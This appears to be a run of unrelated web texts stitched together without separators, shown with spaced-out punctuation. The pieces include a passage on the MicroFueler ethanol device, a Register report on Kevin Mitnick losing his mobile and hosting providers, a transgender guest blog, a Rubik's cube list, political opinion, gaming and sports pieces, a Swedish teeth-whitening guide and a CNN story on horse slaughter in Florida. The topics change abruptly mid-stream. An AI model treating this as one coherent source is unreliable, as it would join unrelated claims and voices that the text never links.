And if they are - it would be a potentially revolutionary finding .
On the cellulosic issue , he wrote :
The MicroFueler is an automated fermentation , distillation , and dispensing platform .
Our fermentation process regulates agitation , temperature , and other parameters to optimize output , but fermentation is fermentation .
Distillation is n’t rocket science .
If you can boil water then you can distill ethanol .
We happen to be able to do this very efficiently and we produce a very high quality fuel .
So the question is , can we really hydrolyze cellulosic materials to liberate the sugars and then convert them into ethanol ?
The answer is yes .
The better question is “ can we do this efficiently in order to get close to the maximum theoretical yields ? ”
You ca n’t just put grass clippings in a MicroFueler and walk away from it and expect ethanol fuel .
There ’s more to it than that .
But , it ’s not a big deal to put a grinder , pump , and a 300 gallon tank next to a MicroFueler or to add a bottle of enzymes now and again .
It ’s like having a pool , and then having the pumps , filters , to make it work , and the chlorine to keep it all clean .
Or like a washing machine for that matter .
Laundry detergent is mostly enzymes , and the clothes do n’t wash themselves .
There ’s another issue here which is that people toss around the term “ cellulosic ” far too often without really knowing what it means .
Food waste ( starch / carbohydrates ) is very easy to work with , but it ’s not cellulosic .
People think that anything other than corn is cellulosic .
Blame that on the media .
Around the economics , he essentially said that not everyone will save money , but some will save a lot of money .
I have n't seen the assumptions that went into those financial calculations , but I am highly skeptical that the average person would save any money .
In his conclusion , he again hit upon the local production aspect , which was the one part I did find appealing :
And here ’s the $ 64,000 controversy …
Say for example I feed my MicroFueler a steady diet of corn ( grain ) and amylase enzymes .
I grow the corn on my farm , make the fuel on my farm , and feed my chickens the WDGS that are left - over from making ethanol .
No transportation .
Then I collect the chicken manure and spread it back in my corn field ( which I also irrigate with the wastewater ) .
By the way I ’m also paying a premium for wind power to run my MicroFueler in this scenario .
Is this sustainable ?
Does this defeat the argument that all corn ethanol is patently unsustainable ( by definition ) ?
I guess it all depends on the price delta between a bushel of corn and a gallon of gasoline .
High gas prices and low corn prices you better believe I ’m making fuel .
I do n't think anyone would argue that corn ethanol is unsustainable by definition .
If a farmer is growing his own corn and taking care of the soil , and using that to produce his own ethanol , then he has a shot at sustainability .
We lose the plot when we try to ramp that up to be a large scale solution .
To conclude , I recognize that my original article was pretty harsh .
But that is because in my opinion there has been a distinct pattern of embellishment with this device , and if there is one thing I loathe it is people making far - fetched promises around renewable energy .
I found the L.A . Times article to be irresponsible , either because the journalist did a poor job or the developers were overselling their device .
The end result of articles like this is that it creates the potential for money - private equity and taxpayer funds - to flow to an undeserving source .
Ultimately this will have the effect that the funds will dry up , and promising technologies wo n't be funded as a result .
Imagine funds for cancer research being diverted to some of the fraudulent cancer cures , and you have the sort of example that gets me worked up .
That is the reason I am quick to pounce on embellishment in this sector .
Thanksgiving , 1976 , San Francisco's Winterland : the Band performs its last concert after 16 years on the road .
Some numbers they do alone , some songs include guest artists from Ronnie Hawkins ( their first boss , when they were the Hawks ) to Bob Dylan ( their last , when as his backup and as a solo group , they came into their own ) .
Scorsese 's camera explores the interactions onstage in the making of music .
Offstage , he interviews the Band 's five members , focusing on the nature of life on the road .
The friendships , the harmonies , the hijinks , and the wear and tear add up to a last waltz .
Written by < jhailey@hotmail.com >
Updated
Over the years , Kevin Mitnick has gotten used to the attacks on his website and cell phone account that routinely result from being a convicted hacker turned security expert .
What he finds much harder to stomach is the treatment he 's getting from his providers .
Over the past month , both HostedHere.net , his longtime webhost , and AT&T , his cellular provider since he was released from prison more than nine years ago , have told him they no longer want him as a customer .
The reason : his status as a celebrity hacker makes his accounts too hard to defend against the legions of script kiddies who regularly attack them .
The move by AT&T came this week after Mitnick hired a lawyer to complain that his privacy was being invaded by people posting Mitnick 's account information in public hacking forums .
It included the eight - digit password Mitnick used to authenticate himself online , the numbers for his cell phone and land lines , his billing address , and the last four digits of his social security number .
" They can't seem to secure my account , " Mitnick told The Register .
" And then instead of doing something about it , they try to kill the messenger and want to boot me off their network when all I want them to do is to secure my account so no one gets access to my phone records . "
Mitnick said the cellular account has been repeatedly breached over the years , despite a wide range of countermeasures he 's followed to prevent the attacks .
In recent years , he 's committed the password to memory and has deliberately not shared it with anyone or kept it stored on a computer .
For a while , his former girlfriend , who was also repeatedly attacked , disabled her online account altogether , but even then she regularly found it would later be restored .
The people carrying out the attacks would then post the phone records online in an attempt to embarrass them .
" There are so many ways into these networks , " he said .
" They have to take some responsibility , not just silence the people that are filing complaints . "
About 18 hours after this article was first published , an AT&T spokeswoman issued the following statement :
" We investigated Mr. Mitnick ’s claims and determined they were without any foundation .
We refused Mr. Mitnick ’s demands for money , but did offer to let him out of his contractual obligations so that he could find a carrier that he would be comfortable with .
In response to your question regarding customer password security : we require that any systems containing sensitive information regarding passwords encrypt the data . "
Mitnick said that per AT&T policy , his password could only be digits and no more than eight characters long .
It was three weeks ago that Mitnick was forced to find a new webhost after Hosted Here told him they no longer wanted to provide service for MitnickSecurity.com , his longtime website .
The decision came after years of relentless attacks that the company was powerless to stop .
In the past three months , Mitnick 's site was taken out twice , and one of those attacks also caused a sustained outage for the South Carolina - based service provider .
After years of trying to fend off the assaults , the company decided it was time to part ways with Mitnick .
" Kevin is a high - profile target , " said David Wykofka , IT director at HostedHere .
" When vulnerabilities come out in third - party vendor software , he is one of the first targets on their list .
This is just one of the perils of being Kevin Mitnick .
If you 're Barack Obama , you do n't get webhosting at GoDaddy . "
No doubt , the companies are free to choose who they count as customers .
But in asking Mitnick to take his business elsewhere , they seem to be making the tacit admission that they are unable to secure the accounts of users whose only fault is being a high - profile target .
What 's most irritating to Mitnick , he says , was the haste AT&T showed in asking him to find another provider .
And that despite the unusually large roaming charges he incurs that often push his monthly bill above $ 2,000 per month .
" You 'd think they 'd like to talk to me and say ' how do you think these guys are getting in ? ' , maybe even offer to set up an account not in my name , " he said .
" Rather than do that , for a customer that spends up to $ 20 K a year , it 's ' goodbye . ' " ®
This article was updated to correct the holder of the cellular account that was re-enabled .
It belonged to Mitnick 's former girlfriend .
The article was later updated to include comment from AT&T .
Transgender has often been cast as a fetish , a going - wrong of sexual desires .
So this sets up a conflict where ordinary sexual expression of a transgender person is labelled fetishistic so some reject such behaviour in themselves and others , condemning the sexually expressive as bringing problems onto the whole transgender community .
Just the word sex alone is a problem .
Our inability to deal with the subject meant that euphamisms became standard for any polite discussion of coitus , of copulation of humans .
So it became ' the sex act ' and then ' sex ' making any discussion of the differences between sex and gender in ordinary english with people uneducated in TG issues a mess to begin with .
Editors ' Note : Guest blogger Bayne MacGregor ( aka Battybattybats et al ) is an Australian crossdresser / genderqueer / bi-gender goth who has suffered from chronic fatigue syndrome for around 19 years .
Others internalized transphobia results in them trying to excuse their transgender nature as purely sexual .
This may be conscious or unconscious .
But as they grow in self - acceptance many self - proclaimed fetishists find that the more they accept being transgender to some extent the more non-sexual TG aspects of themselves get unlocked after years of repression .
Seems a bad ' devil and the deep ' scenario already huh ?
But it gets worse .
Many wonder why if studies suggest TG is comparably common to GLB then why is it so invisible , so closeted ?
Ah , well , here you come to the worst part of the dilemma .
While there are a very significant number of transgender - attracted people as the market for TG pornography indicates , transgender sex workers show this is considered further taboo .
Despite the many women who have had posters of folk from David Bowie to Marilyn Manson to Davey Havok and Jefree Starr on their walls in their teens few seriously consider a relationship with gender non-conformists let alone taking them home to meet their parents .
The attraction is there but the social pressure is strongly to conform and have relationships with cis folk .
Same for those who visit transgender sex - workers , they 'd happily pay for the sex but not consider openly dating the same person or openly admitting their sexual attraction to transgender people to their friends , family and workmates .
And those who do find TG sexually attractive are further condemned by parts of the transgender community just for finding TG attractive !
Now sure if a TG wishes to transition fully then someone who finds the combination attractive may not be for them , but plenty of transgender people do not transition fully .
And in fact it is the fear of not finding a long - term partner that keeps a huge proportion of transgender people in the closet , keeping the knowledge that they are transgender secret form their current and prospective partners .
The desire for sex in fact keeps TG people trying to be Cis !
The sexual drive is the most powerful social force in our and most other species .
Yet for transgender people it is condemned if present and used to invalidate their gender identity and expression .
And yet the taboo of TGs being attractive sexually to others is also one of the major forces holding transgender people back !
The sexest and transphobic notion that a TG person cannot be sexual without their transgender - ness being a fetish causes horrendous harm .
Cis men and women are sexual constantly .
Much of media revolves around Cis sexual expression both male and female .
The transphobic notion that non-gender - binary attraction is wrong also does horrendous harm .
This is perpetuated by some binary - identified transgender people ( and cisgender transsexuals for those who prefer another term ) too which can perpetuate the sexual - phobia in the transgender community .
And in society at large the many TG - attracted people need to start coming out about their attraction .
That taboo needs to be undone .
Transgender people are sexual beings but no moreso than any cis straight or gay or lesbian or bisexual .
We need to be seen in public as sexual beings and more than just sexual beings .
We need to be acknowledged as attractive just like cis-folk get acknowledged as attractive .
And transgender people will not make sufficient headway by trying to cast sexuality out of the community .
That only keeps the majority of transgender folk closeted and lonely and miserable .
The reactionary fear of the sexual taboo and fetish label is holding us back .
We have to find ways to claim our sexual expression and attractiveness as being as valid as everyone else's .
9to5 Mac comically suggests that Palm paid off the Transformers to have them hype up the Pre ’s qwerty keyboard , even though we all know that their gigantic fingers are a much better fit for the iPhone ’s on - screen keyboard .
Optimus Prime and Megatron even throw a casual barbs in the general direction of iPhone users .
Check it all out in the video below .
1. Blind Man Rubik's Cube
This is a new twist on an old game .
Why make a new version of a game when few people can master the original anyway ?
Regardless , this cube features six different materials that all have a very unique texture : metal , wood , textile , stone , rubber and plastic .
It can be done like a regular style Rubik 's cube or if you really have the guts you can bust out the blindfold and really test your skills .
2. Rubik's Cube Mp3 Player
This cool idea belongs to designer Hee Yong .
The only way to activate the mp3 player on is similar to playing with the Rubik`s cube puzzle , by solving each layer has a specific function such as play , pause , forward or back .
And of course the only way to turn it off is by completing it .
Users can now listen to the music while having fun .
3. Pentamix , the world 's hardest Rubik 's cube
For those who think traditional Rubik's Cube is pretty easy , they should have a look at this Rubik 's Cube .
There are 975 individual parts not including the 1,212 stickers that each had to be placed by hand .
In order to create this crazy toy , designer Jason Smith took about 75 hours of work .
Now imagine how long does it take to solve it .
4. Pantone Rubik's Cube
If pouring over color swatches at Home Depot leaves you overwhelmed , the Rubitone could make the process easier by helping to assess your options in a form that nerds can understand .
Unlike a traditional Rubik 's cube , the object here is not to solve it , but to match colors that might look good in a bedroom or living space .
5. Sudokube
For Rubik 's Cube or Sudoku fans , here is a really hard puzzle novelty : Sudokube .
Sudoku Cube is an extremely challenging puzzle that combines the 3 - dimensional spatial relations of a Rubik 's Cube and the mathematical algorithms of Sudoku .
And if you happen to be a fan of both , then the Sudokube will be like a dream come true .
6. LED Rubik's Cube
In this modern version of the old game , the entire digital shebang is crammed with colour - changing LEDs , so instead of manually twisting segments you press buttons to move the colours in the desired direction .
Genius .
But wait , there 's more : the Magic Cube contains other games , including Landmine ( six players take it in turn to push a button until they hit a ' landmine ' ) , Noughts and Crosses and a Simon - style follow - my - leader challenge .
7. Rubik's Ball
Despite a few exceptions , a Rubik 's Cube is just that , a six colored cube .
What if you were to take the Rubik 's Cube , and mold it into the shape of a ball .
You 'd have something that looks eerily similar to the 3D IQ Sphere .
The 70 mm diameter of the IQ Sphere serves as both a brain activity and a sweet piece of nerd decoration for your desk , not to mention , it 's probably the only Rubik 's themed puzzle which you can throw a curve ball with .
8. Rubik's Cube 2.0
Without colors on any side , the only leeway you get is from the varying sizes and even that will probably throw you off track .
On top of that , to create even more frustration , the surrounding sides of each individual block have reflective mirrors on its surface .
9. Irregular Rubik's Cube
The Irregular IQ Cube is a break - through of the traditional IQ game !
If you are still struggling with the traditional Rubik , maybe you could change to this new brain training cube .
See if you can make it from a 3D irregular geometric item to be a regular 3D square cube .
10 . Pyraminx Rubik's Cube
The Pyraminx is a puzzle in the shape of a tetrahedron , divided into 4 axial pieces , 6 edge pieces , and 4 trivial tips .
It can be twisted along its cuts to permute its pieces .
The axial pieces are octahedral in shape , although this is not immediately obvious , and can only rotate around the axis they are attached to .
The 6 edge pieces can be freely permuted .
The trivial tips are so called because they can be twisted independently of all other pieces , making them trivial to place in solved position .
The purpose of the Pyraminx is to scramble the colors , and later to restore them to their original configuration .
There ’s a saying in atheism circles that aims to show Christian hypocrisy related to how they dismiss all the thousands of gods that have existed previously , yet fail to understand how atheists dismiss theirs :
I contend that we are both atheists .
I just believe in one fewer god than you do .
When you understand why you dismiss all the other possible gods , you will understand why I dismiss yours .
– Stephen Roberts
Interestingly enough , the same concept applies to conservatives and healthcare .
Here ’s my modified version of this quote :
I contend that we both support public services .
I just believe in supporting one more than you do .
When you understand why you support public schools , a public fire department , and a public police force , you ’ll then understand why I support public health care .
In other words , you ’ll find that most conservatives are quite comfortable with calling a taxpayer - funded fire truck when their precious home is engulfed in flames .
Similarly , if a conservative sees someone suspicious in his neighborhood he ’ll probably not suffer any philosophical anguish while calling the taxpayer - funded police department .
Neither of these entities are for - profit .
They are publicly funded and are n’t competing directly with private services .
And it ’s the same with public schools .
Private services can compete with them if they so choose , and that ’s fine , but you wo n’t find many conservatives arguing that the public versions of the services should go away .
Ultimately , conservatives need to answer a very simple question : what is the difference between someone ’s home being on fire and someone ’s child needing chemotherapy ?
The answer is nothing –not in a modern society .
So sure–debate all you want about implementation .
Let ’s hear plenty of conversation about efficiency and avoiding bureaucracy and such , but the concept itself of public healthcare should not be fought on principle .
If one wants to have that conversation then it must also be had regarding all the other public services that are widely accepted as foundations of any first world society . ::
Their HBO series keeps getting more and more popular , and now co-stars Anna Paquin and Stephen Moyer are showing that their love for one another has been gaining momentum , as well .
The “ True Blood ” lovers are engaged to be married , with reps for both Anna and Stephen confirming the big news to People magazine .
Offering up no further details , Paquin and Moyer have been together since filming the pilot of “ True Blood ” – going public with their romance February of this year .
Recently making headlines for their steamy love scenes in the popular vampire series , Moyer said of his lovely lady , “ My girl is hardcore . ”
For more help see the Common Knowledge help page
" We should start back , " Gared urged as the woods began to grow dark around them .
" The wildlings are dead . "
Quotations
HURTING DICK CHENEY’S FEELINGS ….
Dick Cheney offered quite a bit of nonsense on Fox News yesterday , but perhaps the most entertaining thing was hearing him talk about how the Obama White House has hurt his feelings .
Apparently , the current president was supposed to seek out the former vice president for advice on national security matters .
“ I guess the other thing that offends the hell out of me , frankly , Chris , is we had a track record now of eight years of defending the nation against any further mass casualty attacks from Al Qaeda .
The approach of the Obama administration should be to come to those people who were involved in that policy and say , ‘ How did you do it ?
What were the keys to keeping this country safe over that period of time ? ' ”
Got that ?
What Obama really ought to do , according to Dick Cheney , is seek out the former vice president ’s advice and follow it .
After all , Cheney believes he ’s proven himself on the issue .
I seem to recall the Bush / Cheney era a little differently .
Cheney thinks it was a sterling success when it came to national security and counter - terrorism .
Perhaps there ’s something to this .
After all , except for the catastrophic events of 9/11 , and the anthrax attacks against Americans , and terrorist attacks against U.S. allies , and the terrorist attacks against U.S. troops in Iraq and Afghanistan , and Bush ’s inability to capture those responsible for 9/11 , and waging an unnecessary war that inspired more terrorists , and the success terrorists had in exploiting Bush ’s international unpopularity , the Bush / Cheney record on counter - terrorism was awesome .
After the previous administration established a record like that , President Obama did n’t ask Cheney for tips ?
The nerve .
I am curious about something , though .
Terrorists first attacked the World Trade Center in 1993 , early on in President Clinton ’s first year in office .
Six people were killed , hundreds more were injured .
The Clinton administration caught those responsible , subjected them to the U.S. criminal justice system , and foreign terrorists did not strike again on U.S. soil during Clinton ’s terms in office .
So , at any point in 2001 , did the Bush White House turn to Bill Clinton and Al Gore and ask , “ How did you do it ?
What were the keys to keeping this country safe over that period of time ? ”
I think we can probably guess the answer .
For that matter , did Al Gore find a sympathetic media personality in order to complain about how it “ offends the hell ” out of him that Bush / Cheney did n’t seek the previous administration ’s guidance ?
After all , Clinton / Gore had a track record of eight years of defending the nation against any further attacks from foreign terrorists .
The approach of the Bush / Cheney administration should have been to go to those people who were involved in that policy , right ?
Server Status : Online .
155 Players Online . [ 2:03:40 PM ]
Create a Free Account
Play DragonFable
What is DragonFable ?
DragonFable is an animated fantasy RPG that you can play using your web browser .
Each week the DragonFable creative team add new original content based on the suggestions of you and your fellow players as we evolve our ongoing storyline .
DragonFable is free to play , but if you like what we are doing you can help support the game by upgrading with a powerful Dragon Amulet unlocking exclusive areas and powerful items .
DragonFable News
Train your dragon !
HAPPENING NOW !
You are the hero of DragonFable , and by your side stands your valiant companion , your dragon !
If you have n't gotten your dragon companion yet , find out how to train your dragon from a hatchling to titan - sized and fulfill your destiny of saving the world !
The Spells We Weave
This week , the Book 3 main story continues !
With Swordhaven safe for now , the consequences of actions of the past begin to emerge .
Six Heroes : Darkheart
This week , ring in the Lunar New Year with the latest installment of Six Heroes !
What 's Mine is Yours Veryrus the Boxcat in Book 3 Amityvale may be in some legal trouble !
Head over for a chat and see if you can play politics and help him out !
Daybreak !
This week in DragonFable , Swordhaven is under siege !
Will The Golden Hand Magesters control the rift in time ?
Or will Swordhaven be buried under sand and sun ?
The Corrupted Seven : Pride
This week in DragonFable , the corrupted elemental spirit of Pride has appeared at the Arena at the Edge of Time !
An Epic Web RPG
In AdventureQuest , a series of events that will change the shape of the world forever are taking place .
A story so large is unfolding that it will take two very different games to tell it .
DragonFable is a brand new web based role playing game which will take you deeper than ever into the Adventure Quest world .
Create your character and become the hero of an evolving weekly storyline .
The DragonFable RPG is like a playable web comic with a new chapter released weekly .
The chapters will run parallel to the events happening in AQ giving you a deeper look into the stories behind the wars and characters .
Ever heard of the butterfly effect ?
You might do something in one game that causes thousands of players to be engulfed in a war in the other .
This is going to be Epic !
View the Official FAQ page Account Help
Account Manager - Edit your existing account with the Account Manager
- Edit your existing account with the Account Manager Lost your Password ? - Use the Password Recovery page .
- Use the Password Recovery page .
Not a Guardian ? - Become an AdventureQuest Guardian !
- Become an AdventureQuest Guardian !
Still having trouble ?
- Visit the Lost Password Page
Every time Tiger Woods does n’t win a PGA tournament he plays in , analysts believe he has lost his edge .
They comment that he ’s not the same player since he won the “ Tiger Slam ” in 2001 .
Heck , even when he does n’t play , he gets flack for not winning .
Those analysts are right .
Woods is n’t the same golfer .
He ’s better .
If you had to bet your life savings and all your assets on one golfer in a major , whom would you bet on ?
Everyone would say Tiger Woods .
Most other golfers would even agree and bet with you .
Woods is that good .
He ’s so good it hurts his reputation as the best golf ever – and soon to be the best golfer ever – when he does n’t win .
Still , does n’t mean he ’s losing competitive edge and intimidation on the field .
Let ’s look at the facts :
In 2009 , after missing the beginning of the golf season recovering from a knee injury , Woods has played in 10 events .
He ’s won three of those events and finished in the top 10 eight times .
To put that in perspective , he ’s leading both of those categories and tops the money list even though he has played in only a third of the PGA tournaments .
Woods is also preparing to do something he never does anymore : play in three tournaments in row .
I guess that eliminates any wonder if his knee is holding up .
Since only winning one tournament overall and not winning a major tournament for the first time ever in 2004 , Woods has won 28 tournaments ( including six majors ) .
He won seven straight tournaments from the end of the 2006 to the beginning of 2007 season .
And let ’s not forget his string of wins from the end of 2007 through the beginning of 2008 when he won eight of the eleven tournaments he played in – including a major on a hobbled knee .
What makes his wins total even more impressive is the fact that Woods almost always plays in the tournaments that attracts the best golfers .
Analysts like to note that Woods is starting to waiver from his current golf coach .
Woods has a tendency to go through golf coaches like the TV show Lost goes through mysteries that make no sense to anybody ( including the writers and producers ) .
Typically , Woods play disappears for a year or so when he switches golf coaches .
However , even though Woods just missed the cut at the major for only the second time in his career , he looks as good as always does .
True , he has n’t won a major in 2009 yet , but the rest of his stats are there and let ’s not ignore the upcoming fourth – and final – major of the year .
What more do you need to say to prove that Woods has n’t lost his edge and is the best ever ?
How many athletes can say they have gone through two major technique reconstructions and come out the best athlete in their sport each time ?
There is only one active athlete on the planet right now that compares to Tiger Woods : Michael Phelps ( sorry Roger Federer but your armor has been pierced by Rafael Nadal ) .
Woods and Phelps are so dominant in their sport that if they do n’t win , people gasp in shock .
Right now , Woods is golf .
Without him , his passion , and his immense talent , golf would n’t be mainstream .
Great golfers like Ernie Els , Phil Mickelson , and Vijay Singh would still be popular , but they would n’t be household names without Woods .
Woods might not be setting records at Augusta anymore , but he set the bar pretty high in 1997 .
Let ’s just not forget that he ’s not perfect ( even if he strives for it and comes pretty darn close ) .
He will lose from time to time , but even the best the do .
Read more about Tiger Woods at these blogs :
Share this : Twitter
Facebook
Like this : Like Loading ...
Related
Varför har jag gula eller missfärgade tänder ?
Alla har vi olika mörk grundfärg på våra tänder .
Tänderna kan även bli gulare eller missfärgade om de är rotfyllda ( då åt ett blågrått håll ) , har en ärftlig sjukdom eller som barn ha fått en viss typ av antibiotika eller tetracykliner .
Barn som dricker vatten med mycket fluor i kan ocks å i vissa fall få missfärgningar på tänderna .
Våra tänder blir ofta mörkare med åren , men faktorer som till exempel kaffe , tobak och vin kan också påskynda processen .
Bör du göra något åt dina tänder ?
Du kan putsa dina tänder hos en tandläkare och försöka hålla en god munhygien – detta kan minska risken för gulare tänder .
De allra flesta av oss kan ocks å välja att bleka våra tänder , men det går att inte garantera ett specifikt resultat av blekningen .
Om du är gravid , ammar , har isande tandhalsar eller tunn emalj bör du dock inte bleka dina tänder .
Om du känner dig osäker kan du alltid rådfråga vår specialist Peter i frågeformuläret lite längre ned på den här sidan .
Metoder och tekniker för att bleka dina tänder
Blekning av tänder är en kemisk process .
Blekmedlet tränger in i tänderna och bryter ned de missfärgade ämnena i tanden , för att ersätta dem med mindre missfärgade ämnen .
Idag används oftast geler för att bleka tänderna .
Det finns dock många olika sorters blekmedel och metoder för tandblekning på marknaden idag .
5 olika metoder för tandblekning
Du kan till exempel bleka tänderna genom blekningsskenor , plasmaljusblekning , tandkrämsgel , laserblekning eller klordioxidblekning .
Du kan dessutom välja mellan att bleka tänderna på en klinik , eller köpa hem egen tandblekning från affärer , via postorder eller via internet .
Hos en tandläkare används ofta blekgeler som innehåller en maxvolym på 6 % väteperoxid .
Tandblekningsskenor- eller remsor
Ett av de absolut vanligaste sätten att bleka sina tänder på idag är med hjälp av blekningsgel tillsammans med blekningsskena .
Gelen stryks vanligen ut i en plastskena , som du sedan placerar på tänderna under dag- eller nattetid .
En annan metod för tandblekning med gel är engångsremsor och engångsskenor , som du använder under dagtid .
Det finns ocks å ett lack som innehåller väteperoxid eller karbamidperoxid som kan penslas på tänderna i syfte att bleka dem .
Skenor , remsor och penslar av detta slag är en vanlig metod för tandblekning hos tandläkare och kliniker , och ocks å den metod som oftast används om du köper hem tandblekningsprodukter .
Resultatet av blekningen varierar dock .
Faktorer som märke på produkten , hur ofta du använder det , hur dina tänder såg ut innan du började bleka dem samt om du röker eller snusar kan påverka resultatet .
Laser , ultraljud eller plasmaljus
Ett snabbare , men lika effektivt sätt , att bleka tänderna på är med hjälp av laser , ultraljud eller plasmaljus .
Blekgel används fortfarande , men istället för att få den att tränga in i tänderna med hjälp av skenor , remsor eller penslar aktiveras den genom ljus eller ljud .
Det räcker oftast med att göra det en gång , till skillnad från blekning med skenor eller remsor .
Denna metod är dock oftast lite dyrare än att bleka tänderna med skenor eller remsor .
Ultraljudsblekning är dessutom ännu en ovanlig metod att bleka tänderna med , då man inte har hittat tillräckligt stabila geler för denna metod .
Tandblekningstandkräm
Att bleka tänder med tandkräm är vanligt idag .
Det är dock viktigt att skilja på två sorters tandkrämer för detta : tandkrämer som ska ge vitare tänder genom slipning av tänderna , samt tandkrämer som består av aktiva ingredienser utan någon större slipverkan .
Den förstnämnda varianten är tandkrämer som du idag kan hitta på apotek och i livsmedelsbutiker .
Det är dock viktigt att inte använda dessa varje dag , då deras slipverkan kan skada emaljen vid ett för frekvent bruk .
Den sistnämnda varianten av tandkräm innehåller ämnen som karbamidperoxid , enzymer eller pyrophosphate , vilka tränger in i tänderna och därför inte slipar dem lika mycket .
Klordioxidblekning
Att bleka tänderna med klordioxid är vanligt på exempelvis den engelska marknaden , där ämnen som väteperoxid är olagligt att sälja .
Klordioxid har en liknande verkan på tänderna som väteperoxid , men då väteperoxid redan finns på den svenska marknaden är klordioxidsblekning mindre vanligt här .
Klordioxiden förekommer dock i andra produkter för tand - och munhygien , till exempel i munskölj och tandkräm .
Blästring
Blästring är ingen egentlig tandblekningsmetod , utan snarare ett alternativ till tandblekning .
Genom att blästra tänderna tas ytliga missfärgningar bort .
Om du inte har så gula tänder , utan snarare har problem med enstaka missfärgningar kan blästring vara en bra metod för dig .
Vi garanterar enbart kvaliteten på de produkter vi har recenserat
Produkter som du köper hem från andra ställen som inte är listade och recenserade på vår hemsida kan dock innehålla andra ämnen , så som natriumklorit och natriumperborat samt sura lösningar som citronsyra .
Det är därför alltid bra att prata med din tandläkare innan du använder dig av blekmedel som du har köpt hem på egen hand och som inte är listade på vår hemsida .
Precis här nedanför ser du alla våra recenserade varumärken för tandblekningsprodukter .
MIAMI , Florida ( CNN ) -- Geronimo was a beautiful painted quarter horse .
Geronimo " was irreplaceable , " says the woman who owned him .
" He was a type of horse that he got along with everybody , " says owner Ivonne Rodriguez .
She had Geronimo for five years -- until his slaughtered carcass was found under a tree .
For Geronimo , home was a 10 - acre pasture in a rural area of Miami - Dade County .
The horse , Rodriguez says , made many people happy over the years .
" He was ridden by everybody , " she says .
" He was irreplaceable . "
Geronimo had a distinct look -- brown and white , with a thick white stripe that ran from his forehead to his nose .
It was this mark that helped a neighbor identify Geronimo after he was reported missing .
Someone is killing horses in Southeast Florida .
Since January , 19 horses have been reported butchered -- 17 in Miami -Dade County and two in Broward County .
And that might be just a conservative estimate .
" That number is extremely low , " says Richard " Kudo " Couto of the South Florida Society for the Prevention of Cruelty to Animals .
" There are many more slaughters in South Florida . "
Couto , an SPCA investigator , says many butcherings are going unreported by people who do not want to get involved with law enforcement .
Police concede that underreporting of such animal cruelty crimes is a concern .
Do n't Miss Nonprofit organization : Geronimo's Neigh
Nonprofit organization : Geronimo's Neigh South Florida SPCA
The reported deaths are being investigated by a multiagency team that includes Scott Andress from the Miami - Dade Police Department .
" In the majority of these cases , the carcasses exhibited signs of being slaughtered and dismembered , and the meat removed from the bodies , " Andress says .
Couto says the killing of horses for their meat is South Florida 's " dirty little secret . "
But it is a secret no longer , with the number of reported horse deaths on the rise .
" At this point in the investigation , we 're attempting to confirm the existence of a black market demand , " Andress says .
Watch why horse owners are terrified »
Law enforcement authorities say it may be premature to focus solely on a killing - horses - for - meat theory .
But Couto believes that is exactly what is happening And , he says , it has been going on for years .
The SPCA 's Couto says he knows firsthand that there is a black market for horse meat .
He even quotes prices -- a pound of horse meat might sell for anywhere from $ 7 to $ 20 , with one recent report of $ 40 for a pound in Broward County .
The interest in the meat stems from cultural demand , according to Couto .
The Miami area is a melting pot , he says , made up of many nationalities .
" In their country of origin , horse meat is legal to buy and eat , " Couto explains .
He also says people may be interested in horse meat because of a false belief that it will cure medical ailments such as AIDS or ease the side effects of chemotherapy .
Andress may not want to pinpoint a motive yet , but he does admit that killing the animals is not the perpetrator 's main goal .
The goal comes afterward , he explains , with " whatever activity they engaged in postmortem . "
In some instances of the grisly " activity " to which Andress refers , the only evidence of a crime is a bare carcass left at the scene .
Like Geronimo .
" Not only was my horse stolen , he was butchered , " Rodriguez says .
She believes her beloved horse was tied to a palm tree , and she points out stains that appear to be blood .
She thinks he was an easy target .
" Geronimo is a type of horse -- my goodness , if you had an apple in your hand , he 's your best friend . "
Whoever slaughtered Geronimo concealed the carcass with a tarp and palm fronds .
It was found in a rural area near the pasture the animal called home .
All About Florida • The Society for the Prevention of Cruelty to Animals
Trials HD is one of the better games released during this year 's Summer of Arcade promotion on Xbox Live , but the game does have a major flaw : the user - created tracks can only be traded among friends , and only the creator can give the track to a friend .
This effectively stops the spread of content and , with no central server , there is no way to have a track spread out to a large number of people .
It turns out this issue was addressed by the game 's developer back in July , and its explanation reveals something about the 360's online system : truly sharing user - created content is very hard to do .
On the game 's official forum , the developer explained that among consoles , only LittleBigPlanet has universal sharing .
That is , you can create content , upload it to a central server , and then anyone can use the content in their own game .
Achieving this is not a simple thing .
" A system like [ LittleBigPlanet 's ] requires huge server capacity and lots of paid moderators to check out all the levels before they can be available to all other players ... the moderators are checking that no levels contain any vulgar stuff or break any copyrights , " it was explained .
" No Xbox 360 games yet have a system like this , and I am not sure if Microsoft is going to announce any this generation , as it requires lots of server capacity and work force . "
By only allowing people who have friended one other to share content , you have a mutually agreed - upon relationship with anyone you 're trading with .
Once someone has made a reputation for their track via YouTube videos or word of mouth , you 're encouraged to add them to your friend list manually and ask for the track .
" The best level creators will receive lots of friend requests I believe , and we will have a forum topic about level trading to help finding good level creators to add to your friend list , " the developer wrote .
No hope for widespread sharing of UGC in the near future
" Sony has made a huge financial effort to provide the server network for the LittleBigPlanet content sharing system and all the workforce that monitors and moderates the content every day ...
It 's kind of a test case for user created content sharing for consoles , " the developer wrote on the forum .
" I am pretty sure that in future we get more open user created content sharing in consoles too , as we get more and more games that have used various means for user created content sharing without any major legal issues .
It just requires some more time for the big players in the industry to adjust . "
The issues with allowing content to spread freely are great .
Without moderation you open yourself up for both legal and PR issues if obscene content begins to spread .
If copyrighted material were to be added to levels or tracks , you would have to deal with takedown notices from the owners of the content being used .
If you do moderate the content , you 're stuck paying people to do nothing but check the content on a daily basis before allowing it on the server .
On Xbox Live Arcade titles , often made by smaller developers with a limited budget , that 's simply not an option .
Once the promotion ends and the sales of the game begin to dwindle , you still have to pay moderators or shut down the track sharing server .
Limiting the track sharing to the creators of the track , and only then between people who are online friends , allows the limited ability to share content , without sticking RedLynx with the cost of moderating the content ... and that would only happen if Microsoft had the infrastructure to provide the game its own server for content uploading and downloading .
For an Xbox Live title , that 's unlikely .
Everybody loves secrets , mystery , and intrigue .
That 's why mystery novels and films have been popular for decades , and why shows like " The X - Files " and " Lost " are cult hits .
The commercial appeal of a good mystery ( real or manufactured ) has not been lost on advertisers .
" Mystery meat " aside , several famous brands have emphasized the uniqueness of their secret - ingredient - containing products .
According to Jay Bush of Bush 's Best Beans , " Our baked beans are made from a secret recipe that 's been passed down and closely guarded by generations of the Bush family . "
In their commercials , Duffy " Duke " of Castlebury , Jay 's treacherous golden retriever , repeatedly tries to sell the secret recipe to the highest bidder .
